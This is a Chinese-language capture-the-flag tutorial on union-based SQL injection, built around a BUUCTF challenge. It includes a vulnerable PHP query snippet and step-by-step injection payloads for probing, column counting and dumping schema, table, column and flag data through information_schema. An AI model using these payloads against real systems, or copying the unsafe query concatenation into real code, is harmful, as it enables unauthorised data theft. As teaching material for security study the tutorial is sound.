SQL注入——联合查询注入

0.前言

  联合查询注入是可回显的注入，在联合查询中，一般会将数据库查询的数据返回到页面中。联合查询注入利用的前提是初始的页面上有显示位，在一个网页的正常界面中，服务端执行SQL语句查询数据库中的数据，客户端将数据展示在页面中，这个展示数据的位置就叫显示位。

<?php
...

$id=$_GET['id']；

$getid="SELECT id FROM users WHERE uer_id = '$id'";

$result = mysql_query($getid) or die('<pre>'.mysql_error().'</pre>');

$num=mysql_numrows($result);
...

  可以看见在$id变量中，该变量会将get传送过来的参数直接拼接到SQL语句中，如果我们输入的内容为：

?id=-1'union+select+1+--+

  拼接后SQL语句就变成了：

SELECT id FROM users WHERE user_id='-1'union select 1 -- '

   闭合前面的单引号，注释掉了后面的单引号，只需要在中间写上需要的Payload（有效负荷代码）就可以了。而加号则是服务器在处理用户输入的时候已自动将其转义为空字符了。

 （接下来的演示以BUUCTF中的SQL注入-1为例）：

1.判断注入点

 &Emsp;我们在可能存在SQL注入变量的后边添加Payload：

and 1=1/and 1=2（整型判断）

单引号判断'显示数据库错误信息或者页面回显不同（整型、字符串类型判断）

\（转义符）

-1/+1回显下一个或上一个页面（整型判断）

注：加号'+'在URL中有特殊含义，因此在需要对其进行URL编码为%2b

 

2.判断是整型还是字符型

  输入and 1=1和and 1=2根据界面是否变化判断是否为整型注入。 判断是字符型还是数字型的表格：

输入’ and 1=1 %23和 ‘ and 1=2%23后发现页面变化，判断为字符注入

  

3.判断查询列数

  order by 函数是对MySQL中查询结果按照指定字段名进行排序，除了指定字 段名还可以指定字段的栏位进行排序，第一个查询字段为1，第二个为2，依次 类推。

  输入3列时，页面正常:

'order by 3%23

  输入4列时,页面出错，说明只有3列

'order by 4%23

 

4.判断显示位

  union的作用是将两个select查询结果合并，程序在展示数据的时候通常只会取结果集的第一行数据，看一下源码，mysql_fetch_array只被调用了一次，而mysql_fetch_array从结果集中取得一行作为关联数组或数字数组或二者兼有，具体看第二个参数是什么。所以这里无论怎么折腾最后只会出来第一行的查询结果。只要让第一行查询的结果是空集，即union左边的select子句查询结果为空，那么union右边的查询结果自然就成为了第一行，打印在网页上了

?id=-1' union select 1,2,3%23

 

5.获取所有数据库名

  可以通过使用注入查询数据库语句显示当前所有数据库： databas()

?id=-1' union select 1,2,(select group_concat(schema_name) from information_schema.schemata)%23

  可以看见，输入完毕后，第三行会将所存在的数据库输出到显示屏中

 

6.获取表名

  在获取数据库的信息后，查找对应数据库里所拥有的表：

?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='mysql'),3%23

  ’mysql’为数据库名，通过改变数据库名，进行不同数据库的内容查询

 

7.获列名

  查看表的内容

?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='note' and table_name='fl4g'),3%23

8.获取列中的信息

?id=-1' union select 1,group_concat(fllllag),3 from fl4g%23

  最终获得flag